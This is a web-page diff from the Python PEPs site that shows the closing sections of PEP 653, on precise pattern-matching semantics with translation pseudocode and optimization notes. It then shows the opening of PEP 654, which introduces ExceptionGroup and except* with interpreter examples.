PEP 634 privileges some builtin classes with a special form of matching, the “self” match. +For example the pattern list(x) matches a list and assigns the list to x. +By allowing classes to choose which kinds of pattern they match, other classes can use this form as well.

+

For example, using sympy, we might want to write:

+
# a*a == a**2
+case Mul(args=[Symbol(a), Symbol(b)]) if a == b:
+    return Pow(a, 2)
+
+
+

Which requires the sympy class Symbol to “self” match. +For sympy to support this pattern with PEP 634 is possible, but a bit tricky. +With this PEP it can be implemented very easily [1].

+
+
+

Robustness

+

With this PEP, access to attributes during pattern matching becomes well defined and deterministic. +This makes pattern matching less error prone when matching objects with hidden side effects, such as object-relational mappers. +Objects will have more control over their own deconstruction, which can help prevent unintended consequences should attribute access have side-effects.

+

PEP 634 relies on the collections.abc module when determining which patterns a value can match, implicitly importing it if necessary. +This PEP will eliminate surprising import errors and misleading audit events from those imports.

+
+
+

Efficient implementation

+

The semantics proposed in this PEP will allow efficient implementation, partly as a result of having precise semantics +and partly from using the object model.

+

With precise semantics, it is possible to reason about what code transformations are correct, +and thus apply optimizations effectively.

+

Because the object model is a core part of Python, implementations already handle special attribute lookup efficiently. +Looking up a special attribute is much faster than performing a subclass test on an abstract base class.

+
+
+
+

Rationale

+

The object model and special methods are at the core of the Python language. Consequently, +implementations support them well. +Using special attributes for pattern matching allows pattern matching to be implemented in a way that +integrates well with the rest of the implementation, and is thus easier to maintain and is likely to perform better.

+

A match statement performs a sequence of pattern matches. In general, matching a pattern has three parts:

+
    +
  1. Can the value match this kind of pattern?
  2. +
  3. When deconstructed, does the value match this particular pattern?
  4. +
  5. Is the guard true?
  6. +
+

To determine whether a value can match a particular kind of pattern, we add the __match_container__ +and __match_class__ attributes. +This allows the kind of a value to be determined in a efficient fashion.

+
+
+

Specification

+
+

Additions to the object model

+

The __match_container__ and __match_class__ attributes will be added to object. +__match_container__ should be overridden by classes that want to match mapping or sequence patterns. +__match_class__ should be overridden by classes that want to change the default behavior when matching class patterns.

+

__match_container__ must be an integer and should be exactly one of these:

+
0
+MATCH_SEQUENCE = 1
+MATCH_MAPPING = 2
+
+
+

MATCH_SEQUENCE is used to indicate that instances of the class can match sequence patterns.

+

MATCH_MAPPING is used to indicate that instances of the class can match mapping patterns.

+

__match_class__ must be an integer and should be exactly one of these:

+
0
+MATCH_SELF = 8
+
+
+

MATCH_SELF is used to indicate that for a single positional argument class pattern, the subject will be used and not deconstructed.

+
+

Note

+

In the rest of this document, we will refer to the above values by name only. +Symbolic constants will be provided both for Python and C, and the values will +never be changed.

+
+

object will have the following values for the special attributes:

+
__match_container__ = 0
+__match_class__= 0
+__match_args__ = ()
+
+
+

These special attributes will be inherited as normal.

+

If __match_args__ is overridden, then it is required to hold a tuple of unique strings. It may be empty.

+
+

Note

+

__match_args__ will be automatically generated for dataclasses and named tuples, as specified in PEP 634.

+
+

The pattern matching implementation is not required to check that any of these attributes behave as specified. +If the value of __match_container__, __match_class__ or __match_args__ is not as specified, then +the implementation may raise any exception, or match the wrong pattern. +Of course, implementations are free to check these properties and provide meaningful error messages if they can do so efficiently.

+
+
+

Semantics of the matching process

+

In the following, all variables of the form $var are temporary variables and are not visible to the Python program. +They may be visible via introspection, but that is an implementation detail and should not be relied on. +The pseudo-statement FAIL is used to signify that matching failed for this pattern and that matching should move to the next pattern. +If control reaches the end of the translation without reaching a FAIL, then it has matched, and following patterns are ignored.

+

Variables of the form $ALL_CAPS are meta-variables holding a syntactic element, they are not normal variables. +So, $VARS = $items is not an assignment of $items to $VARS, +but an unpacking of $items into the variables that $VARS holds. +For example, with the abstract syntax case [$VARS]:, and the concrete syntax case[a, b]: then $VARS would hold the variables (a, b), +not the values of those variables.

+

The pseudo-function QUOTE takes a variable and returns the name of that variable. +For example, if the meta-variable $VAR held the variable foo then QUOTE($VAR) == "foo".

+

All additional code listed below that is not present in the original source will not trigger line events, conforming to PEP 626.

+
+

Preamble

+

Before any patterns are matched, the expression being matched is evaluated:

+
match expr:
+
+
+

translates to:

+
$value = expr
+
+
+
+
+

Capture patterns

+

Capture patterns always match, so the irrefutable match:

+
case capture_var:
+
+
+

translates to:

+
capture_var = $value
+
+
+
+
+

Wildcard patterns

+

Wildcard patterns always match, so:

+
case _:
+
+
+

translates to:

+
# No code -- Automatically matches
+
+
+
+
+

Literal Patterns

+

The literal pattern:

+
case LITERAL:
+
+
+

translates to:

+
if $value != LITERAL:
+    FAIL
+
+
+

except when the literal is one of None, True or False , +when it translates to:

+
if $value is not LITERAL:
+    FAIL
+
+
+
+
+

Value Patterns

+

The value pattern:

+
case value.pattern:
+
+
+

translates to:

+
if $value != value.pattern:
+    FAIL
+
+
+
+
+

Sequence Patterns

+

A pattern not including a star pattern:

+
case [$VARS]:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) != len($VARS):
+    FAIL
+$VARS = $value
+
+
+

Example: [2]

+

A pattern including a star pattern:

+
case [$VARS]
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) < len($VARS):
+    FAIL
+$VARS = $value # Note that $VARS includes a star expression.
+
+
+

Example: [3]

+
+
+

Mapping Patterns

+

A pattern not including a double-star pattern:

+
case {$KEYWORD_PATTERNS}:
+
+
+

translates to:

+
$sentinel = object()
+$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
+for $KEYWORD in $KEYWORD_PATTERNS:
+    $tmp = $value.get(QUOTE($KEYWORD), $sentinel)
+    if $tmp is $sentinel:
+        FAIL
+    $KEYWORD_PATTERNS[$KEYWORD] = $tmp
+
+
+

Example: [4]

+

A pattern including a double-star pattern:

+
case {$KEYWORD_PATTERNS, **$DOUBLE_STARRED_PATTERN}:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
+$tmp = dict($value)
+if not $tmp.keys() >= $KEYWORD_PATTERNS.keys():
+    FAIL:
+for $KEYWORD in $KEYWORD_PATTERNS:
+    $KEYWORD_PATTERNS[$KEYWORD] = $tmp.pop(QUOTE($KEYWORD))
+$DOUBLE_STARRED_PATTERN = $tmp
+
+
+

Example: [5]

+
+
+

Class Patterns

+

Class pattern with no arguments:

+
case ClsName():
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+
+
+

Class pattern with a single positional pattern:

+
case ClsName($VAR):
+
+
+

translates to:

+
$kind = type($value).__match_class__
+if $kind == MATCH_SELF:
+    if not isinstance($value, ClsName):
+        FAIL
+    $VAR = $value
+else:
+    As other positional-only class pattern
+
+
+

Positional-only class pattern:

+
case ClsName($VARS):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attr) < len($VARS):
+    raise TypeError(...)
+try:
+    for i, $VAR in enumerate($VARS):
+        $VAR = getattr($value, $attrs[i])
+except AttributeError:
+    FAIL
+
+
+

Example: [6]

+

Class patterns with all keyword patterns:

+
case ClsName($KEYWORD_PATTERNS):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+try:
+    for $KEYWORD in $KEYWORD_PATTERNS:
+        $tmp = getattr($value, QUOTE($KEYWORD))
+        $KEYWORD_PATTERNS[$KEYWORD] = $tmp
+except AttributeError:
+    FAIL
+
+
+

Example: [7]

+

Class patterns with positional and keyword patterns:

+
case ClsName($VARS, $KEYWORD_PATTERNS):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attr) < len($VARS):
+    raise TypeError(...)
+$pos_attrs = $attrs[:len($VARS)]
+try:
+    for i, $VAR in enumerate($VARS):
+        $VAR = getattr($value, $attrs[i])
+    for $KEYWORD in $KEYWORD_PATTERNS:
+        $name = QUOTE($KEYWORD)
+        if $name in pos_attrs:
+            raise TypeError(...)
+        $KEYWORD_PATTERNS[$KEYWORD] = getattr($value, $name)
+except AttributeError:
+    FAIL
+
+
+

Example: [8]

+
+
+

Nested patterns

+

The above specification assumes that patterns are not nested. For nested patterns +the above translations are applied recursively by introducing temporary capture patterns.

+

For example, the pattern:

+
case [int(), str()]:
+
+
+

translates to:

+
$kind = type($value).__match_class__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) != 2:
+    FAIL
+$value_0, $value_1 = $value
+#Now match on temporary values
+if not isinstance($value_0, int):
+    FAIL
+if not isinstance($value_1, str):
+    FAIL
+
+
+
+
+

Guards

+

Guards translate to a test following the rest of the translation:

+
case pattern if guard:
+
+
+

translates to:

+
[translation for pattern]
+if not guard:
+    FAIL
+
+
+
+
+

Non-conforming special attributes

+

All classes should ensure that the the values of __match_container__, __match_class__ +and __match_args__ follow the specification. +Therefore, implementations can assume, without checking, that the following are true:

+
__match_container__ == 0 or __match_container__ == MATCH_SEQUENCE or __match_container__ == MATCH_MAPPING
+__match_class__ == 0 or __match_class__ == MATCH_SELF
+
+
+

and that __match_args__ is a tuple of unique strings.

+
+
+
+

Values of the special attributes for classes in the standard library

+

For the core builtin container classes __match_container__ will be:

+
    +
  • list: MATCH_SEQUENCE
  • +
  • tuple: MATCH_SEQUENCE
  • +
  • dict: MATCH_MAPPING
  • +
  • bytearray: 0
  • +
  • bytes: 0
  • +
  • str: 0
  • +
+

Named tuples will have __match_container__ set to MATCH_SEQUENCE.

+
    +
  • All other standard library classes for which issubclass(cls, collections.abc.Mapping) is true will have __match_container__ set to MATCH_MAPPING.
  • +
  • All other standard library classes for which issubclass(cls, collections.abc.Sequence) is true will have __match_container__ set to MATCH_SEQUENCE.
  • +
+

For the following builtin classes __match_class__ will be set to MATCH_SELF:

+
    +
  • bool
  • +
  • bytearray
  • +
  • bytes
  • +
  • float
  • +
  • frozenset
  • +
  • int
  • +
  • set
  • +
  • str
  • +
  • list
  • +
  • tuple
  • +
  • dict
  • +
+
+ +
+
+

Security Implications

+

None.

+
+
+

Implementation

+

The naive implementation that follows from the specification will not be very efficient. +Fortunately, there are some reasonably straightforward transformations that can be used to improve performance. +Performance should be comparable to the implementation of PEP 634 (at time of writing) by the release of 3.10. +Further performance improvements may have to wait for the 3.11 release.

+
+

Possible optimizations

+

The following is not part of the specification, +but guidelines to help developers create an efficient implementation.

+
+

Splitting evaluation into lanes

+

Since the first step in matching each pattern is check to against the kind, it is possible to combine all the checks against kind into a single multi-way branch at the beginning +of the match. The list of cases can then be duplicated into several “lanes” each corresponding to one kind. +It is then trivial to remove unmatchable cases from each lane. +Depending on the kind, different optimization strategies are possible for each lane. +Note that the body of the match clause does not need to be duplicated, just the pattern.

+
+
+

Sequence patterns

+

This is probably the most complex to optimize and the most profitable in terms of performance. +Since each pattern can only match a range of lengths, often only a single length, +the sequence of tests can be rewritten in as an explicit iteration over the sequence, +attempting to match only those patterns that apply to that sequence length.

+

For example:

+
case []:
+    A
+case [x]:
+    B
+case [x, y]:
+    C
+case other:
+    D
+
+
+

Can be compiled roughly as:

+
  # Choose lane
+  $i = iter($value)
+  for $0 in $i:
+      break
+  else:
+      A
+      goto done
+  for $1 in $i:
+      break
+  else:
+      x = $0
+      B
+      goto done
+  for $2 in $i:
+      del $0, $1, $2
+      break
+  else:
+      x = $0
+      y = $1
+      C
+      goto done
+  other = $value
+  D
+done:
+
+
+
+
+

Mapping patterns

+

The best strategy here is probably to form a decision tree based on the size of the mapping and which keys are present. +There is no point repeatedly testing for the presence of a key. +For example:

+
match obj:
+    case {a:x, b:y}:
+        W
+    case {a:x, c:y}:
+        X
+    case {a:x, b:_, c:y}:
+        Y
+    case other:
+        Z
+
+
+

If the key "a" is not present when checking for case X, there is no need to check it again for Y.

+

The mapping lane can be implemented, roughly as:

+
# Choose lane
+if len($value) == 2:
+    if "a" in $value:
+        if "b" in $value:
+            x = $value["a"]
+            y = $value["b"]
+            goto W
+        if "c" in $value:
+            x = $value["a"]
+            y = $value["c"]
+            goto X
+elif len($value) == 3:
+    if "a" in $value and "b" in $value:
+        x = $value["a"]
+        y = $value["c"]
+        goto Y
+other = $value
+goto Z
+
+
+
+
+
+
+

Summary of differences between this PEP and PEP 634

+

The changes to the semantics can be summarized as:

+
    +
  • Requires __match_args__ to be a tuple of strings, not just a sequence. +This make pattern matching a bit more robust and optimizable as __match_args__ can be assumed to be immutable.
  • +
  • Selecting the kind of container patterns that can be matched uses cls.__match_container__ instead of +issubclass(cls, collections.abc.Mapping) and issubclass(cls, collections.abc.Sequence).
  • +
  • Allows classes to opt out of deconstruction altogether, if necessary, but setting __match_class__ = 0.
  • +
  • The behavior when matching patterns is more precisely defined, but is otherwise unchanged.
  • +
+

There are no changes to syntax. All examples given in the PEP 636 tutorial should continue to work as they do now.

+
+
+

Rejected Ideas

+
+

Using attributes from the instance’s dictionary

+

An earlier version of this PEP only used attributes from the instance’s dictionary when matching a class pattern with __match_class__ was the default value. +The intent was to avoid capturing bound-methods and other synthetic attributes. However, this also mean that properties were ignored.

+

For the class:

+
class C:
+    def __init__(self):
+        self.a = "a"
+    @property
+    def p(self):
+        ...
+    def m(self):
+        ...
+
+
+

Ideally we would match the attributes “a” and “p”, but not “m”. +However, there is no general way to do that, so this PEP now follows the semantics of PEP 634.

+
+
+

Lookup of __match_args__ on the subject not the pattern

+

An earlier version of this PEP looked up __match_args__ on the class of the subject and +not the class specified in the pattern. +This has been rejected for a few reasons:

+
* Using the class specified in the pattern is more amenable to optimization and can offer better performance.
+* Using the class specified in the pattern has the potential to provide better error reporting is some cases.
+* Neither approach is perfect, both have odd corner cases. Keeping the status quo minimizes disruption.
+
+
+
+
+

Combining __match_class__ and __match_container__ into a single value

+

An earlier version of this PEP combined __match_class__ and __match_container__ into a single value, __match_kind__. +Using a single value has a small advantage in terms of performance, +but is likely to result in unintended changes to container matching when overriding class matching behavior, and vice versa.

+
+
+
+

Deferred Ideas

+

The original version of this PEP included the match kind MATCH_POSITIONAL and special method +__deconstruct__ which would allow classes full control over their matching. This is important +for libraries like sympy.

+

For example, using sympy, we might want to write:

+
# sin(x)**2 + cos(x)**2 == 1
+case Add(Pow(sin(a), 2), Pow(cos(b), 2)) if a == b:
+    return 1
+
+
+

For sympy to support the positional patterns with current pattern matching is possible, +but is tricky. With these additional features it can be implemented easily [9].

+

This idea will feature in a future PEP for 3.11. +However, it is too late in the 3.10 development cycle for such a change.

+
+

Having a separate value to reject all class matches

+

In an earlier version of this PEP, there was a distinct value for __match_class__ that allowed classes to not match any class +pattern that would have required deconstruction. However, this would become redundant once MATCH_POSITIONAL is introduced, and +complicates the specification for an extremely rare case.

+
+
+
+

Code examples

+ +
class Symbol:
+    __match_class__ = MATCH_SELF
+
+
+ +

This:

+
case [a, b] if a is b:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) != 2:
+    FAIL
+a, b = $value
+if not a is b:
+    FAIL
+
+
+ +

This:

+
case [a, *b, c]:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) < 2:
+    FAIL
+a, *b, c = $value
+
+
+ +

This:

+
case {"x": x, "y": y} if x > 2:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+$tmp = $value.get("x", $sentinel)
+if $tmp is $sentinel:
+    FAIL
+x = $tmp
+$tmp = $value.get("y", $sentinel)
+if $tmp is $sentinel:
+    FAIL
+y = $tmp
+if not x > 2:
+    FAIL
+
+
+ +

This:

+
case {"x": x, "y": y, **z}:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+$tmp = dict($value)
+if not $tmp.keys() >= {"x", "y"}:
+    FAIL
+x = $tmp.pop("x")
+y = $tmp.pop("y")
+z = $tmp
+
+
+ +

This:

+
match ClsName(x, y):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attr) < 2:
+    FAIL
+try:
+    x = getattr($value, $attrs[0])
+    y = getattr($value, $attrs[1])
+except AttributeError:
+    FAIL
+
+
+ +

This:

+
match ClsName(a=x, b=y):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+try:
+    x = $value.a
+    y = $value.b
+except AttributeError:
+    FAIL
+
+
+ +

This:

+
match ClsName(x, a=y):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attr) < 1:
+    raise TypeError(...)
+$positional_names = $attrs[:1]
+try:
+    x = getattr($value, $attrs[0])
+    if "a" in $positional_names:
+        raise TypeError(...)
+    y = $value.a
+except AttributeError:
+    FAIL
+
+
+ +
class Basic:
+    __match_class__ = MATCH_POSITIONAL
+    def __deconstruct__(self):
+        return self._args
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0653.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0654/index.html b/pep-0654/index.html new file mode 100644 index 00000000000..0daff3a738d --- /dev/null +++ b/pep-0654/index.html @@ -0,0 +1,1569 @@ + + + + + + + + PEP 654 – Exception Groups and except* | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 654 – Exception Groups and except*

+
+
Author:
+
Irit Katriel <irit at python.org>, +Yury Selivanov <yury at edgedb.com>, +Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Feb-2021
+
Python-Version:
+
3.11
+
Post-History:
+
22-Feb-2021, +20-Mar-2021, +03-Oct-2021
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Exception groups and except* clause.

+

×

+

See Raising and Handling Multiple Unrelated Exceptions for a user-focused tutorial.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This document proposes language extensions that allow programs to raise and handle +multiple unrelated exceptions simultaneously:

+
    +
  • A new standard exception type, the ExceptionGroup, which represents a +group of unrelated exceptions being propagated together.
  • +
  • A new syntax except* for handling ExceptionGroups.
  • +
+
+
+

Motivation

+

The interpreter is currently able to propagate at most one exception at a +time. The chaining features introduced in PEP 3134 link together +exceptions that are related to each other as the cause or context, but +there are situations where multiple unrelated exceptions need to be propagated +together as the stack unwinds. Several real world use cases are listed below.

+
    +
  • Concurrent errors. Libraries for async concurrency provide APIs to invoke +multiple tasks and return their results in aggregate. There isn’t currently +a good way for such libraries to handle situations where multiple tasks +raise exceptions. The Python standard library’s asyncio.gather() [1] +function provides two options: raise the first exception, or return the +exceptions in the results list. The Trio [2] +library has a MultiError exception type which it raises to report a +collection of errors. Work on this PEP was initially motivated by the +difficulties in handling MultiErrors [9], which are detailed in a design +document for an improved version, MultiError2 [3]. +That document demonstrates how difficult it is to create an effective API +for reporting and handling multiple errors without the language changes we +are proposing (see also the Programming Without ‘except *’ section.)

    Implementing a better task spawning API in asyncio, inspired by Trio +nurseries [13], was the main motivation for this PEP. That work is currently +blocked on Python not having native language level support for exception +groups.

    +
  • +
  • Multiple failures when retrying an operation. The Python standard +library’s socket.create_connection function may attempt to connect to +different addresses, and if all attempts fail it needs to report that to the +user. It is an open issue how to aggregate these errors, particularly when +they are different (see issue 29980 [4].)
  • +
  • Multiple user callbacks fail. Python’s atexit.register() function +allows users to register functions that are called on system exit. If any of +them raise exceptions, only the last one is reraised, but it would be better +to reraise all of them together (see atexit documentation [5].) +Similarly, the pytest library allows users to register finalizers which +are executed at teardown. If more than one of these finalizers raises an +exception, only the first is reported to the user. This can be improved with +ExceptionGroups, as explained in this issue by pytest developer Ran Benita +(see pytest issue 8217 [6].)
  • +
  • Multiple errors in a complex calculation. The Hypothesis library performs +automatic bug reduction (simplifying code that demonstrates a bug). In the +process it may find variations that generate different errors, and +(optionally) reports all of them (see the Hypothesis documentation [7].) +An ExceptionGroup mechanism as we are proposing here can resolve some of +the difficulties with debugging that are mentioned in the link above, and +which are due to the loss of context/cause information (communicated +by Hypothesis Core Developer Zac Hatfield-Dodds).
  • +
  • Errors in wrapper code. The Python standard library’s +tempfile.TemporaryDirectory context manager +had an issue where an exception raised during cleanup in __exit__ +effectively masked an exception that the user’s code raised inside the context +manager scope. While the user’s exception was chained as the context of the +cleanup error, it was not caught by the user’s except clause +(see issue 40857 [8].)

    The issue was resolved by making the cleanup code ignore errors, thus +sidestepping the multiple exception problem. With the features we propose +here, it would be possible for __exit__ to raise an ExceptionGroup +containing its own errors along with the user’s errors, and this would allow +the user to catch their own exceptions by their types.

    +
  • +
+
+
+

Rationale

+

Grouping several exceptions together can be done without changes to the +language, simply by creating a container exception type. +Trio [2] is an example of a library that has made use of this technique in its +MultiError [9] type. However, such an approach requires calling code to catch +the container exception type, and then to inspect it to determine the types of +errors that had occurred, extract the ones it wants to handle, and reraise the +rest. Furthermore, exceptions in Python have important information attached to +their __traceback__, __cause__ and __context__ fields, and +designing a container type that preserves the integrity of this information +requires care; it is not as simple as collecting exceptions into a set.

+

Changes to the language are required in order to extend support for +exception groups in the style of existing exception handling mechanisms. At +the very least we would like to be able to catch an exception group only if +it contains an exception of a type that we choose to handle. Exceptions of +other types in the same group need to be automatically reraised, +otherwise it is too easy for user code to inadvertently swallow exceptions +that it is not handling.

+

We considered whether it is possible to modify the semantics of except +for this purpose, in a backwards-compatible manner, and found that it is not. +See the Rejected Ideas section for more on this.

+

The purpose of this PEP, then, is to add the ExceptionGroup builtin type +and the except* syntax for handling exception groups in the interpreter. +The desired semantics of except* are sufficiently different from the +current exception handling semantics that we are not proposing to modify the +behavior of the except keyword but rather to add the new except* +syntax.

+

Our premise is that exception groups and except* will be used +selectively, only when they are needed. We do not expect them to become +the default mechanism for exception handling. The decision to raise +exception groups from a library needs to be considered carefully and +regarded as an API-breaking change. We expect that this will normally be +done by introducing a new API rather than modifying an existing one.

+
+
+

Specification

+
+

ExceptionGroup and BaseExceptionGroup

+

We propose to add two new builtin exception types: +BaseExceptionGroup(BaseException) and +ExceptionGroup(BaseExceptionGroup, Exception). They are assignable to +Exception.__cause__ and Exception.__context__, and they can be +raised and handled as any exception with raise ExceptionGroup(...) and +try: ... except ExceptionGroup: ... or raise BaseExceptionGroup(...) +and try: ... except BaseExceptionGroup: ....

+

Both have a constructor that takes two positional-only arguments: a message +string and a sequence of the nested exceptions, which are exposed in the +fields message and exceptions. For example: +ExceptionGroup('issues', [ValueError('bad value'), TypeError('bad type')]). +The difference between them is that ExceptionGroup can only wrap +Exception subclasses while BaseExceptionGroup can wrap any +BaseException subclass. The BaseExceptionGroup constructor +inspects the nested exceptions and if they are all Exception subclasses, +it returns an ExceptionGroup rather than a BaseExceptionGroup. The +ExceptionGroup constructor raises a TypeError if any of the nested +exceptions is not an Exception instance. In the rest of the document, +when we refer to an exception group, we mean either an ExceptionGroup +or a BaseExceptionGroup. When it is necessary to make the distinction, +we use the class name. For brevity, we will use ExceptionGroup in code +examples that are relevant to both.

+

Since an exception group can be nested, it represents a tree of exceptions, +where the leaves are plain exceptions and each internal node represents a time +at which the program grouped some unrelated exceptions into a new group and +raised them together.

+

The BaseExceptionGroup.subgroup(condition) method gives us a way to obtain +an exception group that has the same metadata (message, cause, context, +traceback) as the original group, and the same nested structure of groups, but +contains only those exceptions for which the condition is true:

+
>>> eg = ExceptionGroup(
+...     "one",
+...     [
+...         TypeError(1),
+...         ExceptionGroup(
+...             "two",
+...              [TypeError(2), ValueError(3)]
+...         ),
+...         ExceptionGroup(
+...              "three",
+...               [OSError(4)]
+...         )
+...     ]
+... )
+>>> import traceback
+>>> traceback.print_exception(eg)
+  | ExceptionGroup: one (3 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | TypeError: 1
+    +---------------- 2 ----------------
+    | ExceptionGroup: two (2 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +---------------- 2 ----------------
+      | ValueError: 3
+      +------------------------------------
+    +---------------- 3 ----------------
+    | ExceptionGroup: three (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | OSError: 4
+      +------------------------------------
+
+>>> type_errors = eg.subgroup(lambda e: isinstance(e, TypeError))
+>>> traceback.print_exception(type_errors)
+  | ExceptionGroup: one (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | TypeError: 1
+    +---------------- 2 ----------------
+    | ExceptionGroup: two (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +------------------------------------
+>>>
+
+
+

The match condition is also applied to interior nodes (the exception +groups), and a match causes the whole subtree rooted at this node +to be included in the result.

+

Empty nested groups are omitted from the result, as in the +case of ExceptionGroup("three") in the example above. If none of the +exceptions match the condition, subgroup returns None rather +than an empty group. The original eg +is unchanged by subgroup, but the value returned is not necessarily a full +new copy. Leaf exceptions are not copied, nor are exception groups which are +fully contained in the result. When it is necessary to partition a +group because the condition holds for some, but not all of its +contained exceptions, a new ExceptionGroup or BaseExceptionGroup +instance is created, while the __cause__, __context__ and +__traceback__ fields are copied by reference, so they are shared with +the original eg.

+

If both the subgroup and its complement are needed, the +BaseExceptionGroup.split(condition) method can be used:

+
>>> type_errors, other_errors = eg.split(lambda e: isinstance(e, TypeError))
+>>> traceback.print_exception(type_errors)
+  | ExceptionGroup: one (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | TypeError: 1
+    +---------------- 2 ----------------
+    | ExceptionGroup: two (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +------------------------------------
+>>> traceback.print_exception(other_errors)
+  | ExceptionGroup: one (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | ExceptionGroup: two (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: 3
+      +------------------------------------
+    +---------------- 2 ----------------
+    | ExceptionGroup: three (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | OSError: 4
+      +------------------------------------
+>>>
+
+
+

If a split is trivial (one side is empty), then None is returned for the +other side:

+
>>> other_errors.split(lambda e: isinstance(e, SyntaxError))
+(None, ExceptionGroup('one', [
+  ExceptionGroup('two', [
+    ValueError(3)
+  ]),
+  ExceptionGroup('three', [
+    OSError(4)])]))
+
+
+

Since splitting by exception type is a very common use case, subgroup and +split can take an exception type or tuple of exception types and treat it +as a shorthand for matching that type: eg.split(T) divides eg into the +subgroup of leaf exceptions that match the type T, and the subgroup of those +that do not (using the same check as except for a match).

+
+

Subclassing Exception Groups

+

It is possible to subclass exception groups, but when doing that it is +usually necessary to specify how subgroup() and split() should +create new instances for the matching or non-matching part of the partition. +BaseExceptionGroup exposes an instance method derive(self, excs) +which is called whenever subgroup and split need to create a new +exception group. The parameter excs is the sequence of exceptions to +include in the new group. Since derive has access to self, it can +copy data from it to the new object. For example, if we need an exception +group subclass that has an additional error code field, we can do this:

+
class MyExceptionGroup(ExceptionGroup):
+    def __new__(cls, message, excs, errcode):
+        obj = super().__new__(cls, message, excs)
+        obj.errcode = errcode
+        return obj
+
+    def derive(self, excs):
+        return MyExceptionGroup(self.message, excs, self.errcode)
+
+
+

Note that we override __new__ rather than __init__; this is because +BaseExceptionGroup.__new__ needs to inspect the constructor arguments, and +its signature is different from that of the subclass. Note also that our +derive function does not copy the __context__, __cause__ and +__traceback__ fields, because subgroup and split do that for us.

+

With the class defined above, we have the following:

+
>>> eg = MyExceptionGroup("eg", [TypeError(1), ValueError(2)], 42)
+>>>
+>>> match, rest = eg.split(ValueError)
+>>> print(f'match: {match!r}: {match.errcode}')
+match: MyExceptionGroup('eg', [ValueError(2)], 42): 42
+>>> print(f'rest: {rest!r}: {rest.errcode}')
+rest: MyExceptionGroup('eg', [TypeError(1)], 42): 42
+>>>
+
+
+

If we do not override derive, then split calls the one defined +on BaseExceptionGroup, which returns an instance of ExceptionGroup +if all contained exceptions are of type Exception, and +BaseExceptionGroup otherwise. For example:

+
>>> class MyExceptionGroup(BaseExceptionGroup):
+...     pass
+...
+>>> eg = MyExceptionGroup("eg", [ValueError(1), KeyboardInterrupt(2)])
+>>> match, rest = eg.split(ValueError)
+>>> print(f'match: {match!r}')
+match: ExceptionGroup('eg', [ValueError(1)])
+>>> print(f'rest: {rest!r}')
+rest: BaseExceptionGroup('eg', [KeyboardInterrupt(2)])
+>>>
+
+
+
+
+

The Traceback of an Exception Group

+

For regular exceptions, the traceback represents a simple path of frames, +from the frame in which the exception was raised to the frame in which it +was caught or, if it hasn’t been caught yet, the frame that the program’s +execution is currently in. The list is constructed by the interpreter, which +appends any frame from which it exits to the traceback of the ‘current +exception’ if one exists. To support efficient appends, the links in a +traceback’s list of frames are from the oldest to the newest frame. Appending +a new frame is then simply a matter of inserting a new head to the linked +list referenced from the exception’s __traceback__ field. Crucially, the +traceback’s frame list is immutable in the sense that frames only need to be +added at the head, and never need to be removed.

+

We do not need to make any changes to this data structure. The __traceback__ +field of the exception group instance represents the path that the contained +exceptions travelled through together after being joined into the +group, and the same field on each of the nested exceptions +represents the path through which this exception arrived at the frame of the +merge.

+

What we do need to change is any code that interprets and displays tracebacks, +because it now needs to continue into tracebacks of nested exceptions, as +in the following example:

+
>>> def f(v):
+...     try:
+...         raise ValueError(v)
+...     except ValueError as e:
+...         return e
+...
+>>> try:
+...     raise ExceptionGroup("one", [f(1)])
+... except ExceptionGroup as e:
+...     eg = e
+...
+>>> raise ExceptionGroup("two", [f(2), eg])
+ + Exception Group Traceback (most recent call last):
+ |   File "<stdin>", line 1, in <module>
